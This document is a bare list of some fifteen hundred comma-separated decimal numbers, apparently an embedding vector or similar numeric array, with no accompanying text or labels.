-0.02493666298687458, 0.02481720596551895, 0.014118332415819168, -0.020038923248648643, -0.021248426288366318, -0.011102041229605675, -0.0041100699454545975, -0.013550912030041218, 0.015439826995134354, -0.03398553654551506, 0.02318960428237915, -0.00396448140963912, -0.006704528350383043, 0.01751539297401905, 0.004714821465313435, 0.007466067094355822, 0.01440204307436943, 0.011542540043592453, -0.01466335542500019, 0.002204356249421835, 0.007051700260490179, -0.0021894241217523813, 0.012692313641309738, -0.007854302413761616, -0.04336291551589966, 0.0020998313557356596, 0.007675116881728172, 0.005076925735920668, 0.014073536731302738, -0.01647014357149601, -0.015230776742100716, 0.008869688026607037, 0.004207128658890724, -0.007152492180466652, 0.029953861609101295, -0.01323733665049076, 0.011176702566444874, -0.01655973680317402, 0.0013970878208056092, -0.028147073462605476, 0.026609063148498535, -0.0019505099626258016, -0.003979413770139217, -0.023846618831157684, -0.010347968898713589, -0.01022851187735796, -0.021980101242661476, -0.011602268554270267, 0.004304187837988138, -0.005468894261866808, -0.002391007961705327, 0.017903627827763557, 0.025295035913586617, 0.014700685627758503, 0.020233042538166046, 0.0017843900714069605, -0.004658825695514679, -0.011072177439928055, -0.01806788146495819, 0.008227606303989887, -0.004979866556823254, 0.027803633362054825, 0.00142601877450943, -0.019635755568742752, -0.0014885470736771822, 0.03706155717372894, 0.015215844847261906, 0.000627616245765239, -0.034642551094293594, 0.0018198537873104215, -0.026310419663786888, -0.0022547522094100714, 0.001140441745519638, 0.01658960059285164, -0.00017066962027456611, -0.03727060556411743, -0.014827609062194824, -0.008488918654620647, -0.006902378983795643, 0.02944616787135601, 0.03150680288672447, -0.005151586141437292, 0.0031376145780086517, -0.0055398219265043736, 0.01984480582177639, 0.03192490339279175, -0.032372865825891495, -0.01803801767528057, -0.027415398508310318, -0.020681004971265793, -0.0028875013813376427, 0.013580775819718838, 0.008720366284251213, -0.061819035559892654, 0.006346156820654869, 0.028385987505316734, 0.030013589188456535, 0.013043219223618507, -0.02499639242887497, -0.006663464941084385, -0.018336661159992218, 0.0011787053663283587, -0.007425003685057163, 0.010691408067941666, -0.008653171360492706, -0.005969120655208826, -0.00998213142156601, 0.02968508191406727, -0.011527607217431068, -0.010206113569438457, 0.01334186177700758, 0.02453349530696869, -0.02193530462682247, -0.008563579060137272, -0.045931246131658554, 0.005207581911236048, -0.005222513806074858, -0.015268106944859028, 0.028968339785933495, -0.00011654064292088151, 0.03407512977719307, 0.004770816769450903, 0.003188010537996888, -0.006954641547054052, 0.015193446539342403, 0.0035538480151444674, -0.04178011044859886, -0.032283272594213486, 0.009108602069318295, -0.021517205983400345, 0.010698874481022358, 0.011579870246350765, -0.0038860877975821495, -0.004901472944766283, -0.012953625991940498, 0.006152039393782616, 0.0018963810289278626, -0.013259734958410263, 0.0027176483999937773, -0.010915390215814114, -0.022502725943922997, -0.010333037003874779, -0.0007694715168327093, 0.005980319809168577, 0.0026187230832874775, -0.00360424374230206, 0.004057807382196188, 0.018814489245414734, -0.01717195473611355, 0.006338690873235464, -0.0022211549803614616, -0.03413485735654831, -0.021054308861494064, -0.0031936101149767637, -0.032223545014858246, 0.0010928455740213394, 0.01711222529411316, -0.02490679919719696, -0.007033035159111023, -0.02103937603533268, 0.01299095619469881, 0.017410868778824806, 0.016888244077563286, -0.034642551094293594, -0.0121622234582901, 0.004404979757964611, 0.014192993752658367, -0.04769323766231537, -0.0012169688707217574, -0.025937117636203766, -0.01929231733083725, 0.0021147634834051132, -0.0010163183324038982, 0.011803852394223213, 0.034762006253004074, 0.0016835981514304876, 0.029207253828644753, -0.009220592677593231, -0.04088418185710907, -0.012595254927873611, -0.03544888645410538, -0.012886431999504566, 0.022069694474339485, 0.04533395916223526, -0.004901472944766283, 0.022935757413506508, -0.018784625455737114, 0.00021639929036609828, 0.01573846861720085, -0.03637467697262764, 0.0014885470736771822, 0.0044871061109006405, 0.011953173205256462, 0.02548915334045887, -0.046050701290369034, 0.021263359114527702, 0.016858378425240517, -0.0022304875310510397, -0.033537574112415314, -0.01139321830123663, -0.02554888091981411, -0.031327616423368454, -0.010609281249344349, 0.028326258063316345, 0.01358824223279953, -0.017261546105146408, 0.0254592876881361, 0.010011996142566204, 0.005371835082769394, -0.00596538744866848, 0.010437562130391598, -0.021173765882849693, 0.013438920490443707, 0.029580557718873024, -0.022831233218312263, 0.01101244892925024, -0.01219208724796772, -0.011460413224995136, 0.021726254373788834, 0.007372741121798754, 0.044617217034101486, -0.013946613296866417, -0.018665168434381485, -0.004151133354753256, -0.0050731925293803215, 0.005453961901366711, 0.02281630039215088, -0.02450363151729107, -0.009101135656237602, 0.02368236519396305, 0.00047782828914932907, -0.005823532119393349, 0.007757243700325489, 0.012923762202262878, 0.01606697589159012, 0.0051777176558971405, -0.00511425593867898, 0.027773769572377205, -0.016888244077563286, -0.017037564888596535, 0.0063872202299535275, 0.05784708634018898, -0.0007624721038155258, -0.026818113401532173, -0.015320369973778725, -0.009840276092290878, -0.004923871252685785, 0.016664260998368263, -0.009653625078499317, 0.016186432912945747, -0.009265389293432236, 0.014036205597221851, -0.025175578892230988, 0.039002735167741776, -0.023323994129896164, -0.007533261552453041, 0.02281630039215088, -0.0006406818865798414, -0.002908033085986972, -0.003632241627201438, -0.012901363894343376, -0.0038020946085453033, -0.010952720418572426, -0.0036378412041813135, -0.025877388194203377, -0.04175024852156639, -0.01696290448307991, -0.015021726489067078, 0.009362448006868362, -0.002010238589718938, 0.003809560788795352, -0.005020929966121912, 0.014797745272517204, 0.0010667142923921347, -0.00829480029642582, 0.01411086693406105, -0.009817877784371376, 0.00661866832524538, -0.007320478558540344, -0.029879199340939522, -0.010400230996310711, -0.025280103087425232, -0.030267436057329178, -0.01981494203209877, 0.016514940187335014, -0.038913141936063766, 0.0073764743283391, 0.02115883305668831, -0.009466973133385181, 0.023757025599479675, -0.018993673846125603, -0.011811317875981331, -0.015409962274134159, -0.023906346410512924, 0.012378739193081856, 0.0027475126553326845, -0.006424550898373127, 0.007794573903083801, 0.09681995958089828, -0.012259282171726227, -0.0012365673901513219, -0.023637568578124046, 0.00857104454189539, 0.007249550893902779, -0.0007260750280693173, 0.023144807666540146, 0.0029602956492453814, 0.017231682315468788, 0.009885072708129883, -0.008197741582989693, 0.020785531029105186, 0.017814036458730698, 0.0044647082686424255, 0.01538009848445654, -0.009511769749224186, -0.003326132893562317, 0.020158380270004272, -0.012266747653484344, 0.008645705878734589, 0.012072630226612091, 0.005842197220772505, -0.007551926653832197, 0.019366977736353874, -0.008220139890909195, -0.04413938894867897, -0.030312232673168182, -0.025623541325330734, -0.03392580896615982, 0.0020419692154973745, -0.02153213694691658, -0.032432593405246735, -0.008459053933620453, 0.015350233763456345, 0.004905206151306629, 0.0251158494502306, -0.00427805632352829, -0.0204271599650383, 0.007436202839016914, 0.005017197225242853, -0.017814036458730698, -0.0018049216596409678, 0.016888244077563286, -0.008063352666795254, -0.015409962274134159, 0.022457929328083992, 0.01947150193154812, -0.0025365962646901608, 0.012184621766209602, 0.0013037619646638632, -0.008929416537284851, 0.03739006444811821, 0.0366135910153389, -0.012020368129014969, 0.014543898403644562, -0.01969548501074314, -0.02475747838616371, -0.005487559363245964, -0.010691408067941666, 0.004251925274729729, 0.007070365361869335, -0.008070818148553371, 0.019859738647937775, -0.024458834901452065, -0.010146385058760643, -0.016081908717751503, 0.009369914419949055, -0.016126705333590508, 0.011318557895720005, 0.018874216824769974, 0.009526701644062996, 0.004083938430994749, 0.008055886253714561, 0.011228964664041996, 0.00827986840158701, -0.002157693263143301, 0.00009974199201678857, -0.003270137356594205, -0.004184730350971222, 0.026982367038726807, 0.021367883309721947, 0.007675116881728172, 0.014805210754275322, -0.023966075852513313, 0.01466335542500019, -0.012744576670229435, 0.013528513722121716, 0.010056791827082634, -0.014730550348758698, -0.010706339962780476, -0.0011236431309953332, 0.0006896779523231089, 0.02115883305668831, 0.018202271312475204, 0.028326258063316345, -0.00038846879033371806, 0.005745138507336378, -0.02307014726102352, -0.02048688754439354, -0.012856567278504372, -0.00576753681525588, 0.023562908172607422, -0.010728738270699978, -0.03368689492344856, 0.009974665939807892, 0.0021763585973531008, 0.01935204491019249, 0.009534167125821114, -0.008503850549459457, -0.02190544083714485, -0.019307250156998634, 0.01573846861720085, -0.008660637773573399, -0.007742311339825392, 0.02898327261209488, 0.011340956203639507, 0.0028800354339182377, -0.01809774711728096, -0.017306342720985413, -0.03649413585662842, -0.0062677632085978985, 0.03930137678980827, -0.0181574746966362, 0.00680158706381917, 0.005013464018702507, 0.0014810810098424554, -0.025504084303975105, 0.028147073462605476, 0.031148431822657585, 0.02214435487985611, -0.0060213832184672356, 0.00421086186543107, 0.0005408232100307941, 0.02392127923667431, -0.02232353948056698, 0.014170595444738865, 0.003036822658032179, 0.003908486105501652, -0.002973361173644662, -0.0012916296254843473, 0.013005889020860195, 0.028445715084671974, 0.004207128658890724, -0.0008935948717407882, -0.009033940732479095, -0.0013896217569708824, 0.02115883305668831, 0.015619012527167797, 0.02021810971200466, -0.002372342860326171, -0.03389594331383705, 0.027415398508310318, 0.02490679919719696, -0.003621042473241687, 0.013446386903524399, 0.013804757967591286, -0.03377648815512657, -0.0009705887059681118, 0.00005937856258242391, 0.00349225290119648, 0.0010079190833494067, 0.016216296702623367, -0.0038898210041224957, 0.019486434757709503, 0.029311779886484146, 0.004382581450045109, -0.046050701290369034, -0.005181450396776199, -0.030103182420134544, 0.017276478931307793, 0.004950002301484346, -0.016052044928073883, 0.03058101050555706, 0.014148197136819363, 0.009646158665418625, -0.02714661881327629, -0.009840276092290878, 0.0418398380279541, -0.013774893246591091, 0.006835184525698423, 0.02793802320957184, 0.014730550348758698, -0.00970588717609644, 0.0421384833753109, -0.03204435855150223, 0.023562908172607422, 0.01573846861720085, -0.030790060758590698, 0.014499101787805557, 0.004401246551424265, 0.0256086103618145, -0.0050806584767997265, -0.026250692084431648, -0.01853077858686447, -0.01478281244635582, -0.023323994129896164, -0.004793215077370405, -0.012878965586423874, -0.006017650011926889, -0.013192540034651756, -0.0011068444000557065, -0.013304531574249268, -0.004595364443957806, 0.0009533234406262636, -0.01984480582177639, 0.002168892417103052, 0.018635302782058716, -0.005420364439487457, 0.001909446669742465, -0.013461318798363209, 0.00003782612839131616, 0.0018095880514010787, 0.010990050621330738, -0.00349225290119648, 0.024070600047707558, 0.013871952891349792, -0.03852490708231926, -0.0010023195063695312, -0.007357809226959944, -0.023025350645184517, 0.018082814291119576, 0.026310419663786888, 0.006256564054638147, -0.021666526794433594, 0.0036285086534917355, 0.03535929322242737, -0.019516298547387123, 0.005140386987477541, 0.00827986840158701, -0.02086019143462181, -0.014133265241980553, 0.000037534486182266846, 0.0295058973133564, -0.02938644029200077, -0.020531684160232544, 0.02616109885275364, 0.011587335728108883, 0.025623541325330734, -0.005364369135349989, -0.014775346964597702, -0.016723990440368652, -0.02475747838616371, -0.007055433467030525, -0.0065104104578495026, -0.00012995622819289565, 0.009840276092290878, -0.008936882019042969, -0.0033037345856428146, 0.0220547616481781, -0.004572966136038303, 0.01010905485600233, -0.004490839317440987, -0.015484622679650784, -0.005830998532474041, 0.02162173017859459, -0.02453349530696869, 0.0036658388562500477, -0.008130546659231186, -0.018665168434381485, -0.014252722263336182, -0.010392765514552593, -0.010885525494813919, 0.016544803977012634, -0.03174571692943573, 0.02036743052303791, -0.014528966508805752, -0.012035300023853779, -0.005633147433400154, 0.0024731347803026438, 0.010818331502377987, -0.0006593470461666584, -0.000016798650904092938, -0.010183715261518955, -0.0033018682152032852, -0.0010648478055372834, 0.0015025460161268711, -0.012124893255531788, 0.0002991093206219375, -0.0050657265819609165, -0.0034157256595790386, 0.04897740110754967, 0.006913578137755394, -0.026355216279625893, 0.0008352662553079426, -0.03715115040540695, -0.017261546105146408, 0.001241233665496111, -0.015574215911328793, 0.003863689722493291, -0.004587898030877113, 0.008167876861989498, -0.006693329196423292, -0.011893444694578648, 0.021427612751722336, -0.0026485873386263847, -0.02395114302635193, 0.03153666853904724, -0.009377379901707172, 0.008414257317781448, 0.010362900793552399, 0.04640907421708107, 0.005088124889880419, -0.0032178747933357954, -0.00769004924222827, -0.001306561753153801, -0.018933946266770363, -0.002594458172097802, 0.01705249771475792, -0.027997750788927078, 0.000028478962121880613, -0.026638926938176155, -0.02607150562107563, -0.023786889389157295, -0.001699463464319706, 0.013700232841074467, 0.012027833610773087, 0.00713009387254715, -0.015103853307664394, 0.023577839136123657, -0.007003170903772116, -0.020009059458971024, -0.016395483165979385, -0.017933493480086327, -0.00422579376026988, 0.008772628381848335, 0.025996845215559006, 0.0009047940257005394, -0.01332692988216877, -0.015409962274134159, 0.006219233851879835, 0.026758383959531784, 0.028236664831638336, -0.006293894723057747, 0.0035613139625638723, -0.004666292108595371, 0.013431455008685589, 0.0037218343932181597, 0.0024432705249637365, -0.024428971111774445, -0.04572219401597977, 0.006988238543272018, -0.007533261552453041, -0.009108602069318295, 0.0032104088459163904, -0.0009323251433670521, 0.007477266248315573, 0.017858833074569702, -0.0007307413034141064, -0.04419911652803421, -0.004621495492756367, -0.00693224323913455, -0.0013644237769767642, 0.008197741582989693, 0.0003672371676657349, 0.007596723269671202, -0.016709057614207268, 0.015619012527167797, 0.015439826995134354, -0.039152055978775024, -0.006107242777943611, -0.003613576525822282, 0.002633655210956931, 0.013580775819718838, 0.02214435487985611, -0.024249786511063576, -0.012878965586423874, 0.0028557705227285624, 0.0033223999198526144, -0.022278744727373123, -0.013707699254155159, 0.016186432912945747, -0.000706943217664957, 0.017186885699629784, 0.018411321565508842, 0.00654027471318841, 0.01600724831223488, -0.032223545014858246, -0.03488146513700485, 0.020681004971265793, -0.014573763124644756, 0.003454922465607524, -0.006674664095044136, 0.019800009205937386, -0.02796788699924946, -0.0017125291051343083, -0.0199343990534544, 0.010922855697572231, 0.004319119732826948, 0.0018543844344094396, 0.017336208373308182, 0.03189503774046898, 0.021845711395144463, 0.03488146513700485, 0.016455212607979774, 0.007555659860372543, 0.0071039628237485886, -0.005957921501249075, -0.026937570422887802, 0.007294347509741783, 0.02589232102036476, 0.0012244349345564842, -0.01585792563855648, 0.015574215911328793, -0.0006588803953491151, 0.0019225123105570674, -0.006002717651426792, -0.014252722263336182, 0.02962535433471203, -0.007869234308600426, -0.00769004924222827, -0.007499664090573788, 0.0024115396663546562, -0.0073764743283391, -0.018754759803414345, -0.003036822658032179, -0.0044796401634812355, 0.007921497337520123, -0.035628072917461395, 0.004565500188618898, 0.012289145961403847, 0.006320025771856308, -0.025384627282619476, -0.03535929322242737, -0.000887062109541148, -0.0009892538655549288, 0.006334957666695118, -0.009183262474834919, -0.009295253083109856, -0.020128516480326653, 0.01389435026794672, 0.004214594606310129, 0.003934617154300213, -0.0031170828733593225, 0.00816041138023138, -0.009765615686774254, -0.01870996318757534, -0.015932587906718254, -0.017828967422246933, 0.002568327123299241, 0.00800362415611744, 0.010661543346941471, -0.00029677615384571254, 0.0004017677274532616, 0.005838464479893446, -0.025787794962525368, -0.02103937603533268, -0.014954532496631145, -0.01711222529411316, 0.006820252165198326, 0.00046802908764220774, 0.004259391222149134, 0.011266294866800308, 0.01800815388560295, -0.0058981929905712605, -0.003790895454585552, 0.011706792749464512, 0.004505771212279797, -0.01246833149343729, -0.004964934661984444, 0.006648532580584288, -0.017843900248408318, 0.030357029289007187, 0.005349437240511179, -0.0021147634834051132, 0.009332584217190742, -0.0007470733253285289, 0.0050582606345415115, 0.005140386987477541, -0.007204754743725061, 0.025384627282619476, 0.010034394450485706, 0.015753401443362236, -0.008727832697331905, -0.005159052088856697, -0.012841635383665562, -0.00944457482546568, -0.013513580895960331, 0.00291736563667655, 0.015992315486073494, 0.0015221444191411138, 0.028117207810282707, 0.007854302413761616, 0.026489606127142906, 0.008720366284251213, 0.016156569123268127, 0.0015510753728449345, 0.007891632616519928, 0.008914483711123466, 0.010594349354505539, 0.0026840511709451675, -0.007958827540278435, -0.013005889020860195, -0.000050629267207114026, 0.014790278859436512, 0.008705434389412403, 0.01025837566703558, 0.014835075475275517, 0.006977039854973555, -0.007417537737637758, 0.004013011232018471, -0.005465161055326462, 0.01102738082408905, -0.013961545191705227, 0.024638021364808083, -0.00001585081008670386, -0.005229979753494263, -0.0025067320093512535, 0.02018824592232704, -0.01699276827275753, 0.0023032815661281347, 0.010161316953599453, 0.00816041138023138, -0.010049326345324516, 0.008063352666795254, 0.012371272780001163, 0.00368823716416955, -0.006831451319158077, -0.007951361127197742, -0.00552115635946393, 0.004550567828118801, 0.003115216502919793, -0.010840728878974915, -0.025339830666780472, 0.011311091482639313, 0.0017143955919891596, 0.014715618453919888, -0.003421325236558914, -0.007619121577590704, -0.006331224925816059, 0.013162676244974136, 0.004106336738914251, -0.0121622234582901, -0.0013942880323156714, 0.005088124889880419, -0.0039980788715183735, 0.017261546105146408, -0.008720366284251213, 0.013117879629135132, -0.02401087060570717, 0.005472627002745867, 0.010758602991700172, 0.0086830360814929, 0.0147529486566782, -0.004304187837988138, 0.003968214616179466, -0.007794573903083801, -0.008473985828459263, -0.016425346955657005, 0.016768787056207657, 0.007021836005151272, -0.00493133720010519, -0.007096496876329184, -0.009750683791935444, 0.00998213142156601, 0.0015053458046168089, -0.018814489245414734, 0.002096098382025957, -0.0016089373966678977, 0.01466335542500019, -0.006797853857278824, -0.014073536731302738, 0.015021726489067078, 0.015589147806167603, 0.005808600224554539, 0.017276478931307793, -0.0025365962646901608, 0.008660637773573399, 0.010975118726491928, -0.01594751887023449, 0.0033056011889129877, -0.002105430932715535, 0.004729753360152245, 0.0048230793327093124, -0.012871499173343182, -0.002279016887769103, -0.010848195292055607, -0.004397513344883919, 0.004882807843387127, 0.0010648478055372834, 0.04058554023504257, -0.010362900793552399, -0.01987466961145401, -0.022472862154245377, -0.00934004969894886, 0.008929416537284851, 0.010437562130391598, -0.008488918654620647, -0.02453349530696869, -0.02091991901397705, -0.0030069584026932716, 0.03365702927112579, -0.012654983438551426, 0.0012524327030405402, -0.004154866095632315, -0.0053121065720915794, -0.01714208908379078, -0.008466520346701145, -0.0042481920681893826, 0.014081002213060856, -0.019516298547387123, 0.012587789446115494, -0.011632132343947887, -0.008623307570815086, -0.012274214066565037, 0.002290216041728854, 0.03297015279531479, -0.005801134277135134, -0.0021110305096954107, -0.00769004924222827, -0.00040013453690335155, -0.002241686685010791, -0.011751589365303516, -0.01116176974028349, 0.014932134188711643, -0.0036565063055604696, -0.0044796401634812355, 0.002973361173644662, -0.0024694015737622976, -0.03843531385064125, 0.009272854775190353, 0.00871289987117052, -0.013595707714557648, 0.006723193451762199, -0.008757696487009525, 0.0003532382834237069, 0.019157927483320236, -0.021173765882849693, -0.0006364822038449347, -0.0023200802970677614, 0.00421086186543107, 0.018336661159992218, 0.013050684705376625, 0.02208462543785572, -0.013901816681027412, 0.017127158120274544, -0.014835075475275517, -0.0029453635215759277, -0.0028781688306480646, -0.0014353514416143298, 0.004912672098726034, -0.005845930427312851, -0.012744576670229435, -0.0056368806399405, -0.014969464391469955, 0.0027661777567118406, 0.014282586053013802, 0.0020513019990175962, 0.011139372363686562, 0.009041407145559788, 0.007958827540278435, 0.024040736258029938, -0.0073354109190404415, 0.016022179275751114, 0.0010228512110188603, -0.00999706331640482, 0.0009435242391191423, 0.0023406120017170906, 0.010557019151747227, 0.007742311339825392, 0.037031691521406174, 0.009496836923062801, -0.019605891779065132, 0.0019579760264605284, 0.00817534327507019, 0.023846618831157684, -0.016858378425240517, -0.004770816769450903, 0.014738015830516815, -0.014021273702383041, -0.007425003685057163, 0.008152944967150688, 0.0030144245829433203, 0.001398021006025374, -0.018112678080797195, -0.004434844013303518, -0.011139372363686562, -0.011714259162545204, -0.021114038303494453, -0.0073391436599195, 0.007163691334426403, -0.01502919290214777, 0.009362448006868362, -0.0003999012114945799, -0.010221045464277267, -0.01650000736117363, -0.006700795143842697, -0.004304187837988138, 0.010892991907894611, -0.008638239465653896, 0.01437217928469181, -0.0038338254671543837, 0.022831233218312263, 0.0004139000957366079, 0.01334186177700758, -0.04554300755262375, -0.022771503776311874, 0.0194416381418705, -0.006413351744413376, 0.006465613842010498, 0.017873764038085938, -0.015454758889973164, -0.009504303336143494, 0.009056339040398598, -0.0022435530554503202, 0.0019318448612466455, -0.0024600690230727196, 0.01450656820088625, -0.014006341807544231, -0.0033858614042401314, 0.02478734217584133, -0.027445262297987938, -0.0054427627474069595, -0.003761031199246645, -0.0021240960340946913, 0.0041026039980351925, -0.0012934961123391986, -0.0034605220425873995, 0.024652954190969467, -0.018411321565508842, -0.022009965032339096, 0.0233389250934124, -0.003477320773527026, -0.008966746740043163, -0.004128735046833754, -0.002642987761646509, -0.014319916255772114, -0.013513580895960331, -0.0017619917634874582, 0.002741913078352809, 0.009131000377237797, 0.01969548501074314, 0.02144254371523857, -0.002454469446092844, -0.00002726864295254927, -0.012811770662665367, 0.005017197225242853, -0.014670821838080883, -0.010878060013055801, -0.004270590376108885, 0.03882354870438576, -0.01140815019607544, 0.008645705878734589, 0.0006859449204057455, 0.004401246551424265, 0.014051138423383236, -0.01564887724816799, 0.004733486566692591, -0.019023539498448372, 0.012333942577242851, 0.01708236150443554, 0.0020550349727272987, -0.014596161432564259, 0.003467988222837448, 0.012132358737289906, 0.014820142649114132, -0.014715618453919888, -0.0021819581743329763, 0.0066149355843663216, -0.00236114370636642, 0.010198647156357765, 0.00012295678607188165, -0.010691408067941666, 0.017918560653924942, 0.018724896013736725, 0.009437108412384987, 0.008197741582989693, -0.024339377880096436, -0.024339377880096436, -0.02251765877008438, -0.017007701098918915, -0.009481905028223991, 0.02941630408167839, -0.01582806184887886, 0.004838011227548122, -0.0008604642353020608, 0.010011996142566204, -0.01323733665049076, 0.011034847237169743, -0.019277384504675865, 0.012341408990323544, 0.00491640530526638, -0.013677834533154964, 0.0003138081228826195, 0.026937570422887802, -0.005050794221460819, -0.0066298674792051315, 0.0024115396663546562, 0.007764709647744894, -0.0071039628237485886, 0.010960186831653118, 0.00004132584581384435, -0.010206113569438457, -0.0065178764052689075, 0.015633944422006607, -0.011721725575625896, -0.02368236519396305, 0.005599550437182188, 0.002083032624796033, -0.0009341916302219033, 0.0016490675043314695, -0.009578963741660118, -0.005816066171973944, -0.008623307570815086, 0.00958643015474081, 0.014237789437174797, 0.0034903862979263067, -0.00003100167668890208, 0.008533714339137077, -0.004558033775538206, -0.016425346955657005, 0.01478281244635582, -0.0005380234797485173, 0.011706792749464512, 0.014103400520980358, -0.00048296121531166136, 0.000030360060918610543, 0.008645705878734589, 0.021293222904205322, 0.0015622745268046856, 0.016156569123268127, 0.0014036205830052495, -0.01013891864567995, -0.00986267440021038, -0.022009965032339096, -0.024399107322096825, 0.0009659224306233227, -0.01868009939789772, 0.00627896236255765, -0.0028389720246195793, 0.00009875040268525481, 0.0042481920681893826, 0.016141636297106743, -0.012095028534531593, -0.014327382668852806, 0.013916748575866222, -0.008735298179090023, -0.010907923802733421, -0.02162173017859459, 0.02275657281279564, -0.010833263397216797, 0.014043672010302544, 0.024070600047707558, -0.0025795260444283485, 0.0018609171966090798, 0.0022846164647489786, 0.0074474019929766655, -0.015753401443362236, -0.013535979203879833, -0.009974665939807892, -0.017799103632569313, 0.0028595037292689085, -0.001870249747298658, -0.0015090787783265114, 0.025787794962525368, 0.017799103632569313, -0.01797829009592533, -0.03129775449633598, -0.01600724831223488, 0.002010238589718938, 0.017873764038085938, 0.0090787373483181, 0.012707246467471123, -0.012789372354745865, 0.00595045555382967, -0.01873982883989811, -0.016694126650691032, -0.007966293953359127, -0.008795026689767838, 0.02138281613588333, 0.0020158381666988134, -0.014334849081933498, 0.0004701288999058306, 0.035598207265138626, 0.008130546659231186, -0.010803398676216602, 0.004039142280817032, -0.022442998364567757, -0.022129422053694725, 0.011064711026847363, 0.01414073072373867, 0.016604533419013023, -0.014342314563691616, -0.022189151495695114, -0.018202271312475204, -0.004139934200793505, 0.0011096441885456443, 0.008645705878734589, 0.0019691751804202795, -0.00268778414465487, -0.022801369428634644, 0.017619919031858444, -0.00288376840762794, 0.04324346035718918, 0.030133046209812164, 0.010900457389652729, 0.009123533964157104, -0.000967788917478174, 0.004643893800675869, 0.01271471194922924, 0.000548289273865521, -0.014499101787805557, -0.0042556580156087875, 0.031148431822657585, -0.00006748624582542107, 0.01684344746172428, -0.014678287319839, 0.0002331979339942336, -0.003725567366927862, 0.008093216456472874, 0.01681358367204666, 0.02514571323990822, -0.006107242777943611, 0.012229417450726032, 0.004266857169568539, -0.0033783952239900827, 0.002400340512394905, -0.008675569668412209, -0.01699276827275753, 0.003686370560899377, 0.014954532496631145, -0.000943057588301599, -0.00906380545347929, -0.004726020619273186, 0.012752042151987553, -0.015723537653684616, 0.006924777291715145, 0.00647308025509119, -0.020053856074810028, -0.004505771212279797, -0.0006980772595852613, -0.0006747458246536553, 0.013207472860813141, 0.006588804069906473, -0.040406353771686554, 0.023264264687895775, 0.004296721424907446, -0.007313012611120939, -0.02398100681602955, 0.004453509114682674, -0.01693304069340229, 0.0053121065720915794, 0.015872858464717865, -0.0282217338681221, -0.024921732023358345, -0.011318557895720005, -0.0012151023838669062, 0.012498196214437485, -0.008966746740043163, -0.010250910185277462, 0.027251144871115685, 0.019038470461964607, -0.012722178362309933, 0.0001562041143188253, -0.03724074363708496, -0.021606797352433205, -0.02601177804172039, -0.0052001154981553555, 0.04094391316175461, -0.02595204859972, -0.017858833074569702, 0.001594005268998444, -0.01567874103784561, 0.013924214988946915, 0.008981678634881973, -0.003357863752171397, -0.018426252529025078, -0.02647467330098152, -0.003697569714859128, -0.013998875394463539, -0.01739593595266342, -0.008085750974714756, 0.012886431999504566, -0.008354528807103634, -0.0011553738731890917, 0.007428736891597509, -0.014850007370114326, 0.0029453635215759277, -0.006163238547742367, 0.0001234234223375097, -0.008085750974714756, 0.0003616376197896898, -0.01987466961145401, -0.01051968801766634, 0.0027269809506833553, -0.010527154430747032, -0.010646611452102661, 0.008809959515929222, 0.007660184986889362, -0.006219233851879835, 0.005155319347977638, -0.02929684706032276, 0.0043527171947062016, -0.007383940275758505, 0.01797829009592533, -0.006596270017325878, 0.003574379486963153, 0.00801855605095625, -0.004505771212279797, -0.0147529486566782, -0.014678287319839, -0.0028595037292689085, -0.01705249771475792, -0.0018711830489337444, -0.011744122952222824, -0.017201818525791168, -0.0003639707574620843, 0.037957485765218735, 0.0031432141549885273, -0.010079190135002136, 0.02444390393793583, 0.00984774250537157, -0.03506065160036087, -0.014013808220624924, 0.01754525676369667, 0.00752206239849329, -0.012087562121450901, 0.0028408383950591087, -0.0043601831421256065, -0.020471956580877304, 0.005595817230641842, 0.007264483254402876, 0.0017591920914128423, -0.0176647137850523, -0.02481720596551895, -0.022771503776311874, -0.0028315058443695307, -0.008907018229365349, 0.006346156820654869, 0.002493666484951973, 0.02536969631910324, 0.0077049811370670795, 0.0024768677540123463, 0.00769004924222827, 0.015260640531778336, 0.0019131796434521675, -0.005308373831212521, 0.008974212221801281, 0.008608375675976276, 0.008772628381848335, 0.005946722347289324, -0.014058603905141354, -0.033447980880737305, 0.032462459057569504, -0.010064258240163326, 0.00035557145019993186, 0.005842197220772505, -0.018232135102152824, -0.0028128407429903746, 0.004483373370021582, -0.0038132937625050545, 0.002280883491039276, -0.013789826072752476, -0.024593224748969078, -0.014685753732919693, -0.011736657470464706, 0.010922855697572231, 0.01309548132121563, -0.0035557143855839968, 0.008361995220184326, -0.003529583103954792, -0.018754759803414345, -0.01681358367204666, 0.008376927115023136, 0.00693224323913455, -0.004688689950853586, -0.0264448095113039, -0.005931790452450514, -0.022935757413506508, 0.03150680288672447, 0.002512331586331129, -0.005222513806074858, -0.02051675133407116, -0.004875341895967722, 0.002282750094309449, -0.0066858627833426, -0.009974665939807892, -0.008108148351311684, 0.022965623065829277, -0.01632082276046276, -0.013700232841074467, -0.005502491258084774, 0.01987466961145401, -0.010713806375861168, 0.007973759435117245, 0.007921497337520123, -0.009377379901707172, 0.011296159587800503, 0.027385534718632698, 0.011647064238786697, -0.006286428309977055, 0.005110522732138634, 0.009519235230982304, -0.018665168434381485, -0.012505662627518177, -0.011340956203639507, -0.006566405761986971, 0.012132358737289906, -0.007966293953359127, -0.010960186831653118, -0.004296721424907446, -0.010310638695955276, 0.011953173205256462, 0.014887337572872639, -0.01245339959859848, 0.008750231005251408, -0.005760070867836475, -0.01856064237654209, 0.005625681485980749, -0.021576933562755585, -0.002389141358435154, -0.012124893255531788, -0.009780547581613064, -0.011714259162545204, 0.009175796061754227, -0.022905893623828888, -0.030312232673168182, -0.003912219312041998, -0.011452946811914444, -0.025907251983880997, 0.004304187837988138, -0.012281680479645729, 0.030297299847006798, -0.01424525585025549, -0.020292770117521286, -0.010706339962780476, 0.0002953762887045741, -0.009377379901707172, 0.019800009205937386, -0.02542942389845848, 0.00044843065552413464, -0.021845711395144463, -0.002585125621408224, 0.025728067383170128, 0.012356340885162354, -0.01745566539466381, 0.0019579760264605284, -0.024578291922807693, -0.015163581818342209, -0.0018739828374236822, 0.012662449851632118, -0.01809774711728096, 0.017127158120274544, -0.01879955641925335, -0.01597738265991211, -0.00732421176508069, -0.0034250582102686167, -0.023622635751962662, 0.006700795143842697, 0.010235978290438652, -0.044975586235523224, 0.003419458633288741, -0.01296109240502119, 0.0006495478446595371, -0.006424550898373127, -0.010639145039021969, -0.0199343990534544, -0.0071188947185873985, 0.02711675502359867, 0.01579819805920124, 0.01128869317471981, -0.0018571842228993773, 0.0037759633269160986, 0.01010905485600233, -0.00044936389895156026, -0.00769004924222827, 0.004886541049927473, 0.021830780431628227, -0.009168330579996109, -0.000014480086974799633, 0.00591312488541007, 0.009638692252337933, -0.0032832028809934855, 0.01570860482752323, 0.0121622234582901, 0.01632082276046276, 0.0008068018942140043, 